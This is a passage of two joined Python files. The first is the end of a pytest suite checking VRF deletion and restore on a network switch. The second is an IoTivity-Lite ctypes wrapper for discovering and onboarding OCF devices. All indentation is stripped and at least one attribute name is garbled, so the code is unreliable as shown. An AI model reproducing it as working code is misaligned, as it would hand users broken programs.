assert wait_until(120, 10, 0, check_bgp_facts, duthost, cfg_facts), \
"Bgp sessions should be re-estabalished after restore Vrf1"
def test_pc1_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
show_interfaces = duthost.shell("show ip interfaces")['stdout']
assert 'PortChannel0001' not in show_interfaces, "The ip addr of PortChannel0001 should be flushed after Vrf1 is deleted."
def test_pc2_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
show_interfaces = duthost.shell("show ip interfaces")['stdout']
assert 'PortChannel0002' not in show_interfaces, "The ip addr of PortChannel0002 should be flushed after Vrf1 is deleted."
def test_vlan1000_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
show_interfaces = duthost.shell("show ip interfaces")['stdout']
assert 'Vlan1000' not in show_interfaces, "The ip addr of Vlan1000 should be flushed after Vrf1 is deleted."
def test_loopback0_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
show_interfaces = duthost.shell("show ip interfaces")['stdout']
assert 'Loopback0' not in show_interfaces, "The ip addr of Loopback0 should be flushed after Vrf1 is deleted."
def test_vrf1_neighs_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
ip_neigh_show = duthost.shell("ip neigh show vrf Vrf1", module_ignore_errors=True)['stdout']
assert '' == ip_neigh_show, "The neighbors on Vrf1 should be flushed after Vrf1 is deleted."
def test_vrf1_neighs_flushed_by_traffic(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='drop',
fib_info_files=["/tmp/vrf1_neigh.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
def test_vrf1_routes_flushed(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FibTest",
pkt_action='drop',
fib_info_files=["/tmp/vrf1_fib.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
def test_vrf2_neigh(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf2_neigh.txt"],
src_ports= g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000']
)
def test_vrf2_fib(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf2_fib.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000']
)
@pytest.mark.usefixtures('setup_vrf_restore')
def test_vrf1_neigh_after_restore(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf1_neigh.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
@pytest.mark.usefixtures('setup_vrf_restore')
def test_vrf1_fib_after_resotre(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf1_fib.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
|
iotivity.py | #############################
#
# copyright 2021 Open Connectivity Forum, Inc. All rights reserved.
# copyright 2021 Cascoda Ltd.
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE OPEN CONNECTIVITY FORUM, INC. "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE OR
# WARRANTIES OF NON-INFRINGEMENT, ARE DISCLAIMED. IN NO EVENT SHALL THE OPEN CONNECTIVITY FORUM, INC. OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#############################
#sudo apt-get -y install python3-pip
#sudo pip3 install numpy
#
import ctypes, os, sys
from ctypes import *
import signal
import time
import os
import json
import random
import sys
import argparse
import traceback
from datetime import datetime
from time import gmtime, strftime
from sys import exit
#import jsonref
import os.path
from os import listdir
from os.path import isfile, join
from shutil import copyfile
from collections import OrderedDict
from termcolor import colored
import numpy.ctypeslib as ctl
import uuid
import threading
import time
import json
import requests
import copy
unowned_return_list=[]
unowned_event = threading.Event()
owned_event = threading.Event()
resource_event = threading.Event()
diplomat_event = threading.Event()
so_event = threading.Event()
client_event = threading.Event()
device_event = threading.Event()
resource_mutex = threading.Lock()
ten_spaces = " "
_int_types = (c_int16, c_int32)
if hasattr(ctypes, "c_int64"):
# Some builds of ctypes apparently do not have c_int64
# defined; it's a pretty good bet that these builds do not
# have 64-bit pointers.
_int_types += (c_int64,)
for t in _int_types:
if sizeof(t) == sizeof(c_size_t):
c_ptrdiff_t = t
del t
del _int_types
class UserString:
def __init__(self, seq):
if isinstance(seq, bytes):
self.data = seq
elif isinstance(seq, UserString):
self.data = seq.data[:]
else:
self.data = str(seq).encode()
def __bytes__(self):
return self.data
def __str__(self):
return self.data.decode()
def __repr__(self):
return repr(self.data)
def __int__(self):
return int(self.data.decode())
def __long__(self):
return int(self.data.decode())
def __float__(self):
return float(self.data.decode())
def __complex__(self):
return complex(self.data.decode())
def __hash__(self):
return hash(self.data)
def __cmp__(self, string):
if isinstance(string, UserString):
return cmp(self.data, string.data)
else:
return cmp(self.data, string)
def __le__(self, string):
if isinstance(string, UserString):
return self.data <= string.data
else:
return self.data <= string
def __lt__(self, string):
if isinstance(string, UserString):
return self.data < string.data
else:
return self.data < string
def __ge__(self, string):
if isinstance(string, UserString):
return self.data >= string.data
else:
return self.data >= string
def __gt__(self, string):
if isinstance(string, UserString):
return self.data > string.data
else:
return self.data > string
def __eq__(self, string):
if isinstance(string, UserString):
return self.data == string.data
else:
return self.data == string
def __ne__(self, string):
if isinstance(string, UserString):
return self.data != string.data
else:
return self.data != string
def __contains__(self, char):
return char in self.data
def __len__(self):
return len(self.data)
def __getitem__(self, index):
return self.__class__(self.data[index])
def __getslice__(self, start, end):
start = max(start, 0)
end = max(end, 0)
return self.__class__(self.data[start:end])
def __add__(self, other):
if isinstance(other, UserString):
return self.__class__(self.data + other.data)
elif isinstance(other, bytes):
return self.__class__(self.data + other)
else:
return self.__class__(self.data + str(other).encode())
def __radd__(self, other):
if isinstance(other, bytes):
return self.__class__(other + self.data)
else:
return self.__class__(str(other).encode() + self.data)
def __mul__(self, n):
return self.__class__(self.data * n)
__rmul__ = __mul__
def __mod__(self, args):
return self.__class__(self.data % args)
# the following methods are defined in alphabetical order:
def capitalize(self):
return self.__class__(self.data.capitalize())
def center(self, width, *args):
return self.__class__(self.data.center(width, *args))
def count(self, sub, start=0, end=sys.maxsize):
return self.data.count(sub, start, end)
def decode(self, encoding=None, errors=None): # XXX improve this?
if encoding:
if errors:
return self.__class__(self.data.decode(encoding, errors))
else:
return self.__class__(self.data.decode(encoding))
else:
return self.__class__(self.data.decode())
def encode(self, encoding=None, errors=None): # XXX improve this?
if encoding:
if errors:
return self.__class__(self.data.encode(encoding, errors))
else:
return self.__class__(self.data.encode(encoding))
else:
return self.__class__(self.data.encode())
def endswith(self, suffix, start=0, end=sys.maxsize):
return self.data.endswith(suffix, start, end)
def expandtabs(self, tabsize=8):
return self.__class__(self.data.expandtabs(tabsize))
def find(self, sub, start=0, end=sys.maxsize):
return self.data.find(sub, start, end)
def index(self, sub, start=0, end=sys.maxsize):
return self.data.index(sub, start, end)
def isalpha(self):
return self.data.isalpha()
def isalnum(self):
return self.data.isalnum()
def isdecimal(self):
return self.data.isdecimal()
def isdigit(self):
return self.data.isdigit()
def islower(self):
return self.data.islower()
def isnumeric(self):
return self.data.isnumeric()
def isspace(self):
return self.data.isspace()
def istitle(self):
return self.data.istitle()
def isupper(self):
return self.data.isupper()
def join(self, seq):
return self.data.join(seq)
def ljust(self, width, *args):
return self.__class__(self.data.ljust(width, *args))
def lower(self):
return self.__class__(self.data.lower())
def lstrip(self, chars=None):
return self.__class__(self.data.lstrip(chars))
def partition(self, sep):
return self.data.partition(sep)
def replace(self, old, new, maxsplit=-1):
return self.__class__(self.data.replace(old, new, maxsplit))
def rfind(self, sub, start=0, end=sys.maxsize):
return self.data.rfind(sub, start, end)
def rindex(self, sub, start=0, end=sys.maxsize):
return self.data.rindex(sub, start, end)
def rjust(self, width, *args):
return self.__class__(self.data.rjust(width, *args))
def rpartition(self, sep):
return self.data.rpartition(sep)
def rstrip(self, chars=None):
return self.__class__(self.data.rstrip(chars))
def split(self, sep=None, maxsplit=-1):
return self.data.split(sep, maxsplit)
def rsplit(self, sep=None, maxsplit=-1):
return self.data.rsplit(sep, maxsplit)
def splitlines(self, keepends=0):
return self.data.splitlines(keepends)
def startswith(self, prefix, start=0, end=sys.maxsize):
return self.data.startswith(prefix, start, end)
def strip(self, chars=None):
return self.__class__(self.data.strip(chars))
def swapcase(self):
return self.__class__(self.data.swapcase())
def title(self):
return self.__class__(self.data.title())
def translate(self, *args):
return self.__class__(self.data.translate(*args))
def upper(self):
return self.__class__(self.data.upper())
def zfill(self, width):
return self.__class__(self.data.zfill(width))
class MutableString(UserString):
"""mutable string objects
Python strings are immutable objects. This has the advantage, that
strings may be used as dictionary keys. If this property isn't needed
and you insist on changing string values in place instead, you may cheat
and use MutableString.
But the purpose of this class is an educational one: to prevent
people from inventing their own mutable string class derived
from UserString and than forget thereby to remove (override) the
__hash__ method inherited from UserString. This would lead to
errors that would be very hard to track down.
A faster and better solution is to rewrite your program using lists."""
def __init__(self, string=""):
self.data = string
def __hash__(self):
raise TypeError("unhashable type (it is mutable)")
def __setitem__(self, index, sub):
if index < 0:
index += len(self.data)
if index < 0 or index >= len(self.data):
raise IndexError
self.data = self.data[:index] + sub + self.data[index + 1 :]
def __delitem__(self, index):
if index < 0:
index += len(self.data)
if index < 0 or index >= len(self.data):
raise IndexError
self.data = self.data[:index] + self.data[index + 1 :]
def __setslice__(self, start, end, sub):
start = max(start, 0)
end = max(end, 0)
if isinstance(sub, UserString):
self.data = self.data[:start] + sub.data + self.data[end:]
elif isinstance(sub, bytes):
self.data = self.data[:start] + sub + self.data[end:]
else:
self.data = self.data[:start] + str(sub).encode() + self.data[end:]
def __delslice__(self, start, end):
start = max(start, 0)
end = max(end, 0)
self.data = self.data[:start] + self.data[end:]
def immutable(self):
return UserString(self.data)
def __iadd__(self, other):
if isinstance(other, UserString):
self.data += other.data
elif isinstance(other, bytes):
self.data += other
else:
self.data += str(other).encode()
return self
def __imul__(self, n):
self.data *= n
return self
class String(MutableString, Union):
_fields_ = [("raw", POINTER(c_char)), ("data", c_char_p)]
def __init__(self, obj=""):
if isinstance(obj, (bytes, UserString)):
self.data = bytes(obj)
else:
self.raw = obj
def __len__(self):
return self.data and len(self.data) or 0
def from_param(cls, obj):
# Convert None or 0
if obj is None or obj == 0:
return cls(POINTER(c_char)())
# Convert from String
elif isinstance(obj, String):
return obj
# Convert from bytes
elif isinstance(obj, bytes):
return cls(obj)
# Convert from str
elif isinstance(obj, str):
return cls(obj.encode())
# Convert from c_char_p
elif isinstance(obj, c_char_p):
return obj
# Convert from POINTER(c_char)
elif isinstance(obj, POINTER(c_char)):
return obj
# Convert from raw pointer
elif isinstance(obj, int):
return cls(cast(obj, POINTER(c_char)))
# Convert from c_char array
elif isinstance(obj, c_char * len(obj)):
return obj
# Convert from object
else:
return String.from_param(obj._as_parameter_)
from_param = classmethod(from_param)
def ReturnString(obj, func=None, arguments=None):
return String.from_param(obj)
@CFUNCTYPE(c_int)
def init_callback():
print("init_callback")
return c_int(0)
@CFUNCTYPE(None)
def signal_event_loop():
print("signal_event_loop")
cb_type = CFUNCTYPE(c_int)
class HANDLER(Structure):
_fields_ = [(".init", CFUNCTYPE(c_int)),
(".signal_event_loop", CFUNCTYPE(c_int)),
(".requests_entry", CFUNCTYPE(None))]
_defaults_ = { ".init" : init_callback,
".signal_event_loop": signal_event_loop,
".requests_entry": None
}
def wrap_function(lib, funcname, restype, argtypes):
"""Simplify wrapping ctypes functions"""
func = lib.__getattr__(funcname)
func.restype = restype
func.argtypes = argtypes
return func
class OC_UUID(Structure):
_fields_ = [("id", c_uint8 * 16)]
class OC_DEVICE_HANDLE(Structure):
pass
OC_DEVICE_HANDLE._fields_ = (
('uuid', OC_UUID),
('device_name', c_char * 64),
('next', POINTER(OC_DEVICE_HANDLE)),
)
# python list of copied unowned/owned devices on the local network
#my_unowned_devices = []
#my_owned_devices = []
# python callback of a discovery call
#@CFUNCTYPE(None, POINTER(OC_UUID), c_void_p, c_void_p )
#def unowned_device_cb(uuid, eps, data):
# print("\nDiscovered unowned device:")
# my_uuid = my_iotivity.uuid2str(uuid)
# print (" uuid:",my_uuid)
# if my_uuid not in myunowned_devices:
# my_unowned_devices.append(my_uuid)
# python callback of a discovery call
#@CFUNCTYPE(None, POINTER(OC_UUID), c_void_p, c_void_p )
#def owned_device_cb(uuid, eps, data):
# print("\nDiscovered owned device: ")
# my_uuid = my_iotivity.uuid2str(uuid)
# print (" uuid:",my_uuid)
# if my_uuid not in my_owned_devices:
# my_owned_devices.append(my_uuid)
CHANGED_CALLBACK = CFUNCTYPE(None, c_char_p, c_char_p, c_char_p)
DIPLOMAT_CALLBACK = CFUNCTYPE(None, c_char_p, c_char_p, c_char_p,c_char_p,c_char_p,c_char_p)
RESOURCE_CALLBACK = CFUNCTYPE(None, c_char_p, c_char_p, c_char_p, c_char_p)
CLIENT_CALLBACK = CFUNCTYPE(None, c_char_p, c_char_p,c_char_p)
class Device():
def __init__(self,uuid,owned_state=None,name="",resources=None,resource_array=None, credentials=None, last_event=None):
self.uuid = uuid
self.owned_state = owned_state
self.name = name
self.credentials = credentials
self.resource_array = []
self.last_event = last_event
class Diplomat():
def __init__(self,uuid=None,owned_state=None,name="",observe_state=None,target_dict=None,last_event=None):
self.uuid=uuid
self.owned_state = owned_state
self.name = name
self.observe_state = observe_state
self.target_cred = {}
self.last_event = last_event
diplomat = Diplomat()
class Iotivity():
""" ********************************
Call back handles general task like device
discovery.
needs to be before _init_
**********************************"""
def changedCB(self,uuid,cb_state,cb_event):
print("Changed event: Device: {}, State:{} Event:{}".format(uuid, cb_state,cb_event))
name = ""
if uuid != None:
uuid = uuid.decode("utf-8")
name = self.get_device_name(uuid)
if cb_state != None:
cb_state = cb_state.decode("utf-8")
if cb_event != None:
cb_event = cb_event.decode("utf-8")
if(cb_state=="unowned"):
print("Unowned Discovery Event:{}".format(uuid))
dev = Device(uuid,owned_state=False,name=name,last_event=cb_event)
if not self.device_array_contains(uuid):
self.device_array.append(dev)
if cb_event is not None: #update array entry
for index, device in enumerate(self.device_array):
if device.uuid==uuid:
self.device_array[index] = dev
device_event.set()
unowned_event.set()
if(cb_state=="owned"):
print("Owned Discovery Event:{}".format(uuid))
dev = Device(uuid,owned_state=True,name=name)
self.device_array.append(dev)
owned_event.set()
""" ********************************
Call back handles streamlined onboarding tasks.
Dipomat discovery/state
Observes from diplomat
**********************************"""
def diplomatCB(self,anchor,uri,state,cb_event,target,target_cred):
uuid = str(anchor)[8:-1]
if len(uuid):
diplomat.uuid = uuid
if len(state):
diplomat.owned_state = state
if cb_event is not None:
last_event = diplomat.last_event=cb_event.decode('utf-8').split(":",1)
if last_event[0] == "so_otm":
so_event.set()
diplomat_event.set()
print("Diplomat CB: UUID: {}, Uri:{} State:{} Event:{} Target:{} Target Cred:{}".format(uuid,uri,state,cb_event,target,target_cred))
""" ********************************
Call back handles client command callbacks.
Client discovery/state
**********************************"""
def clientCB(self,cb_uuid,cb_state,cb_event):
uuid=""
state=""
event=""
if len(cb_uuid):
uuid = cb_uuid.decode("utf-8")
if len(cb_state):
state = cb_state.decode("utf-8")
if cb_event is not None:
event = cb_event.decode("utf-8")
print("Command CB: UUID: {}, State:{}, Event:{}".format(uuid,state,event))
""" ********************************
Call back handles resource call backs tasks.
Resources is an dictionary with uuid of device
**********************************"""
def resourceCB(self, anchor, uri, rtypes, myjson):
uuid = str(anchor)[8:-1]
uuid_new = copy.deepcopy(uuid)
my_uri = str(uri)[2:-1]
if 'resources' in self.debug:
print(colored(" Resource Event \n",'green',attrs=['underline']))
print(colored("UUID:{}, \nURI:{}",'green').format(uuid_new,my_uri))
my_str = str(myjson)[2:-1]
my_str = json.loads(my_str)
duplicate_uri = False
if self.resourcelist.get(uuid_new) is None:
mylist = [ my_str ]
#don't add duplicate rsources lists
if uuid_new not in self.resourcelist:
self.resourcelist[uuid_new] = mylist
else:
mylist = self.resourcelist[uuid_new]
#Make sure to not add duplicate resources if second discovery
for resource in mylist:
if my_uri == resource['uri']:
duplicate_uri=True
if not duplicate_uri:
mylist.append(my_str)
#don't add duplicate rsources lists
if uuid_new not in self.resourcelist:
self.resourcelist[uuid_new] = mylist
if 'resources' in self.debug:
print(colored(" -----resourcelist {}",'cyan').format(mylist))
#Look for zero length uri...this means discovery is complete
if len(my_uri) <=0:
resource_event.set()
print("ALL resources gathered");
if 'resources' in self.debug:
print(colored("Resources {}",'yellow').format(self.resourcelist))
def __init__(self,debug=None):
print ("loading ...")
resource_mutex.acquire()
libname = 'libiotivity-lite-client-python.so'
libdir = os.path.dirname(__file__)
self.lib=ctl.load_library(libname, libdir)
# python list of copied unowned devices on the local network
# will be updated from the C layer automatically by the CHANGED_CALLBACK
self.unowned_devices = []
# python list of copied owned devices on the local network
# will be updated from the C layer automatically by the CHANGED_CALLBACK
self.owned_devices = []
# resource list
self.resourcelist = {}
self.device_array = []
print (self.lib)
print ("...")
self.debug=debug
self.lib.oc_set_con_res_announced(c_bool(False));
print("oc_set_con_res_announced - done")
self.lib.oc_set_max_app_data_size(c_size_t(16384));
print("oc_set_max_app_data_size- done")
value = self.lib.oc_get_max_app_data_size()
print("oc_get_max_app_data_size :", value)
self.changedCB = CHANGED_CALLBACK(self.changedCB)
self.lib.install_changedCB(self.changedCB)
ret = self.lib.oc_storage_config("./onboarding_tool_creds");
print("oc_storage_config : {}".format(ret))
self.resourceCB = RESOURCE_CALLBACK(self.resourceCB)
self.lib.install_resourceCB(self.resourceCB)
self.diplomatCB = DIPLOMAT_CALLBACK(self.diplomatCB)
self.lib.install_diplomatCB(self.diplomatCB)
self.clientCB = CLIENT_CALLBACK(self.clientCB)
self.lib.install_diplomatCB(self.clientCB)
print ("...")
self.threadid = threading.Thread(target=self.thread_function, args=())
self.threadid.start()
print ("...")
def thread_function(self):
""" starts the main function in C.
this function is threaded in python.
"""
print ("thread started")
init = self.lib.python_main()
def init_platform(self):
# not used
ret = self.lib.oc_storage_config("./onboarding_tool_creds");
print ("oc_storage_config-done", ret)
ret = self.lib.oc_init_platform("OCF", None, None)
print ("oc_init_platform-done", ret)
ret = self.lib.oc_add_device("/oic/d", "oic.d.dots", "OBT", "ocf.2.2.2", "ocf.res.1.0.0,ocf.sh.1.0.0", None, None)
print ("oc_init_platform-done", ret)
ret = self.lib.oc_device_bind_resource_type(0, "oic.d.ams")
print ("oc_device_bind_resource_type-ams-done", ret)
ret = self.lib.oc_device_bind_resource_type(0, "oic.d.cms")
print ("oc_device_bind_resource_type-cms-done", ret)
print("oc_init_platform-done",ret)
#self.lib.display_device_uuid();
def get_result(self):
self.lib.get_cb_result.restype = bool
return self.lib.get_cb_result()
def purge_device_array(self,uuid):
for index, device in enumerate(self.device_array):
if device.uuid==uuid:
print("Remove: {}".format(device.uuid))
self.device_array.pop(index)
def discover_unowned(self):
print(colored(20*" "+"Discover Unowned Devices"+20*" ",'yellow',attrs=['underline']))
# OBT application
ret = self.lib.discover_unowned_devices(c_int(0x05))
time.sleep(3)
# python callback application
print("discover_unowned- done")
nr_unowned = self.get_nr_unowned_devices()
owned_state=False
#self.purge_device_array(owned_state)
unowned_event.wait(5)
print("UNOWNED DEVICE ARRAY {}".format(self.device_array))
return self.device_array
def device_array_contains(self,uuid):
contains = False
for index, device in enumerate(self.device_array):
if device.uuid == uuid:
contains = True
return contains
def get_device(self,uuid):
ret = None
for index, device in enumerate(self.device_array):
if device.uuid == uuid:
ret = device
return ret
def return_devices_array(self):
return self.device_array
def discover_all(self):
self.discover_unowned()
self.discover_owned()
time.sleep(20)
self.list_owned_devices()
self.list_unowned_devices()
def return_unowned_devices(self):
print("Called return list Thread:{}".format(threading.get_ident()))
unowned_return_list={}
nr_unowned = self.get_nr_unowned_devices()
for i in range(nr_unowned):
uuid = self.get_unowned_uuid(i)+""
unowned_return_list[i] = uuid
return unowned_return_list
def list_unowned_devices(self):
nr_unowned = self.get_nr_unowned_devices()
print ("list_unowned_devices: unowned:",nr_unowned )
for i in range(nr_unowned):
uuid = self.get_unowned_uuid(i)
print (" unowned index {} uuid {}".format(i, uuid))
if uuid not in self.unowned_devices:
self.unowned_devices.append(uuid)
def list_owned_devices(self):
nr_owned = self.get_nr_owned_devices()
print ("list_owned_devices: owned:",nr_owned )
for i in range(nr_owned):
uuid = self.get_owned_uuid(i)
print (" owned index {} uuid {}".format(i, uuid))
if uuid not in self.owned_devices:
self.owned_devices.append(uuid)
def discover_owned(self):
print(colored(20*" "+"Discover Owned Devices"+20*" ",'yellow',attrs=['underline']))
#ret = self.lib.discover_owned_devices(c_int(0x02))
#ret = self.lib.discover_owned_devices(c_int(0x03))
ret = self.lib.discover_owned_devices(c_int(0x05))
time.sleep(3)
# call with call back in python
#ret = self.lib.oc_obt_discover_owned_devices(owned_device_cb, None)
nr_owned = self.get_nr_owned_devices()
owned_state=True
owned_event.wait(5)
print("OWNED DEVICE ARRAY {}",self.device_array)
return self.device_array
def discover_diplomats(self):
print(colored(20*" "+"Discover Diplomats"+20*" ",'yellow',attrs=['underline']))
ret = self.lib.py_discover_diplomat_for_observe();
diplomat_event.wait(5)
return diplomat
def diplomat_set_observe(self,state):
state = copy.deepcopy(state)
print(colored(20*" "+"Set Diplomats"+20*" ",'yellow',attrs=['underline']))
print("Diplomat State: {}".format(state))
self.lib.py_diplomat_set_observe.argtypes = [String]
ret = self.lib.py_diplomat_set_observe(str(state))
print("Waiting for Streamlined OTM ")
so_event.wait()
return diplomat
def quit(self):
self.lib.python_exit(c_int(0))
def sig_handler(self, signum, frame):
print ("sig_handler..")
self.offboard_all_owned()
time.sleep(10)
self.quit()
sys.exit()
def uuid2str(self, oc_uuid):
print (" uuid in:", oc_uuid)
my_uuid = create_string_buffer(50)
self.lib.oc_uuid_to_str.argstype = [ POINTER(OC_UUID), c_char_p, c_int]
self.lib.oc_uuid_to_str(oc_uuid, my_uuid, 50)
return str(my_uuid.value)
def str2uuid(self, my_uuid):
self.lib.oc_uuid_to_str.argtypes = [c_char_p, POINTER(OC_UUID)]
my_uuid_s = OC_UUID()
my_uuid_bytes = str(my_uuid).encode('utf-8')
self.lib.oc_uuid_to_str(my_uuid_bytes, my_uuid_s)
print (" type: ", my_uuid_s)
return my_uuid_s
def test_uuid(self):
my_uuid = str(uuid.uuid4())
print ("uuid in :", my_uuid)
my_s = self.str2uuid(my_uuid)
r_uuid = self.uuid2str(my_s)
print (" returned:", r_uuid)
def get_nr_owned_devices(self):
# retrieves the owned nr owned devices of the IoTivity layer
# note that a discovery request has to be executed before this call
self.lib.py_get_nr_owned_devices.argtypes = []
self.lib.py_get_nr_owned_devices.restype = c_int
return self.lib.py_get_nr_owned_devices()
def get_nr_unowned_devices(self):
# retrieves the owned nr unowned devices of the IoTivity layer
# note that a discovery request has to be executed before this call
self.lib.py_get_nr_unowned_devices.argtypes = []
self.lib.py_get_nr_unowned_devices.restype = c_int
return self.lib.py_get_nr_unowned_devices()
def get_owned_uuid(self, index):
# retrieves the uuid of the owned device
# index of owned list of devices in IoTivity layer
self.lib.get_uuid.argtypes = [c_int, c_int]
if sizeof(c_int) == sizeof(c_void_p):
self.lib.get_uuid.restype = ReturnString
else:
self.lib.get_uuid.restype = String
self.lib.get_uuid.errcheck = ReturnString
uuid = self.lib.get_uuid(1,c_int(index))
uuid_copy = '' + uuid
return uuid_copy
def get_unowned_uuid(self, index):
# retrieves the uuid of the unowned device
# index of unowned list of devices in IoTivity layer
self.lib.get_uuid.argtypes = [c_int, c_int]
if sizeof(c_int) == sizeof(c_void_p):
self.lib.get_uuid.restype = ReturnString
else:
self.lib.get_uuid.restype = String
self.lib.get_uuid.errcheck = ReturnString
uuid = self.lib.get_uuid(0,c_int(index))
uuid_copy = '' + uuid
print ("get_unowned_uuid: uuid:", uuid)
return uuid_copy
def get_owned_device_name(self, index):
# retrieves the uuid of the owned device
# index of owned list of devices in IoTivity layer
self.lib.get_device_name.argtypes = [c_int, c_int]
if sizeof(c_int) == sizeof(c_void_p):
self.lib.get_device_name.restype = ReturnString
else:
self.lib.get_uget_device_nameuid.restype = String
self.lib.get_device_name.errcheck = ReturnString
return self.lib.get_device_name(1,c_int(index))
def get_unowned_device_name(self, index):
# retrieves the uuid of the unowned device
# index of unowned list of devices in IoTivity layer
self.lib.get_device_name.argtypes = [c_int, c_int]
if sizeof(c_int) == sizeof(c_void_p):
self.lib.get_device_name.restype = ReturnString
else:
self.lib.get_device_name.restype = String
self.lib.get_uuid.errcheck = ReturnString
device_name = self.lib.get_device_name(0,c_int(index))
print("Device Name: {}, {}".format(device_name,index))
return device_name
def get_device_name(self, device_uuid):
# retrieves the uuid of the owned device
# index of owned list of devices in IoTivity layer
self.lib.get_device_name_from_uuid.argtypes = [String]
device_name = ""
if sizeof(c_int) == sizeof(c_void_p):
self.lib.get_device_name_from_uuid.restype = ReturnString
else:
self.lib.get_device_name_from_uuid.restype = String
self.lib.get_device_name_from_uuid.errcheck = ReturnString
device_name = self.lib.get_device_name_from_uuid(device_uuid)
print("Device Name: {}".format(device_name))
return str(device_name)
def onboard_all_unowned(self):
print ("onboard_all_unowned: listing NOT onboarded devices in C:")
self.list_unowned_devices()
print ("onboarding...")
self.lib.py_otm_just_works.argtypes = [String]
self.lib.py_otm_just_works.restype = None
for device in self.unowned_devices:
device_name = self.get_device_name(device)
print ("Onboarding device :", device, device_name)
run_count = 0
result = False
while run_count < 5 and not result:
run_count += 1
self.lib.py_otm_just_works(device)
start_time = time.time()
timeout = 10
time.sleep(1)
while True:
result = self.get_result()
end_time = time.time()
if result or end_time > start_time + timeout:
time_taken = end_time - start_time
break
if result:
print (f"Onboarding succeeded for: {device} {device_name}")
print (f"Time taken: {time_taken:.3} seconds")
else:
print (f"Onboarding failed for: {device} {device_name}")
time.sleep(1)
print ("...done.")
def onboard_cloud_proxy(self):
print ("onboard_cloud_proxy: listing NOT onboarded devices in C:")
self.list_unowned_devices()
for device in self.unowned_devices:
device_name = self.get_device_name(device)
if "proxy" in str(device_name).lower():
print ("Onboarding device :", device, device_name)
run_count = 0
result = False
while run_count < 5 and not result:
run_count += 1
self.lib.py_otm_just_works(device)
start_time = time.time()
timeout = 10
time.sleep(1)
while True:
result = self.get_result()
end_time = time.time()
if result or end_time > start_time + timeout:
time_taken = end_time - start_time
break
if result:
print (f"Onboarding succeeded for: {device} {device_name}")
print (f"Time taken: {time_taken:.3} seconds")
else:
print (f"Onboarding failed for: {device} {device_name}")
time.sleep(1)
print ("...done.")
def onboard_chili(self):
print ("onboard_chili: listing NOT onboarded devices in C:")
self.list_unowned_devices()
print ("onboarding...")
self.lib.py_otm_just_works.argtypes = [String]
self.lib.py_otm_just_works.restype = None
for device in self.unowned_devices:
device_name = self.get_device_name(device)
if "cascoda" in str(device_name).lower():
print ("Onboarding device :", device, device_name)
run_count = 0
result = False
while run_count < 5 and not result:
run_count += 1
self.lib.py_otm_just_works(device)
start_time = time.time()
timeout = 10
time.sleep(1)
while True:
result = self.get_result()
end_time = time.time()
if result or end_time > start_time + timeout:
time_taken = end_time - start_time
break
if result:
print (f"Onboarding succeeded for: {device} {device_name}")
print (f"Time taken: {time_taken:.3} seconds")
else:
print (f"Onboarding failed for: {device} {device_name}")
time.sleep(1)
print ("...done.")
for device in self.unowned_devices:
print ("onboard device :", device, self.get_device_name(device))
self.lib.py_otm_just_works(device)
print ("...done.")
def onboard_device(self,device):
print("Onboarding device: {}".format(device))
if device.otm == "justworks":
self.lib.py_otm_just_works.argtypes = [String]
self.lib.py_otm_just_works.restype = None
self.lib.py_otm_just_works(device.uuid)
if device.otm == "randompin":
self.lib.py_otm_rdp.argtypes = [String, String]
self.lib.py_otm_rdp.restype = None
self.lib.py_otm_rdp(device.uuid,device.random_pin)
#remove unowned uuid form resource list
for key in self.resourcelist.keys():
if key == device.uuid:
del self.resourcelist[device.uuid]
break
self.purge_device_array(device.uuid)
def request_random_pin(self,device):
device_event.clear()
print("Request Random PIN: {}".format(device))
self.lib.py_request_random_pin.argtypes = [String]
self.lib.py_request_random_pin.restype = None
self.lib.py_request_random_pin(device.uuid)
device_event.wait(5)
ret =""
for index, device_a in enumerate(self.device_array):
print("uuid:{}, last_event:{}".format(device_a.uuid,device_a.last_event))
if device_a.uuid==device.uuid:
ret = device_a
return ret
def offboard_device(self,device):
print ("offboard device :", device)
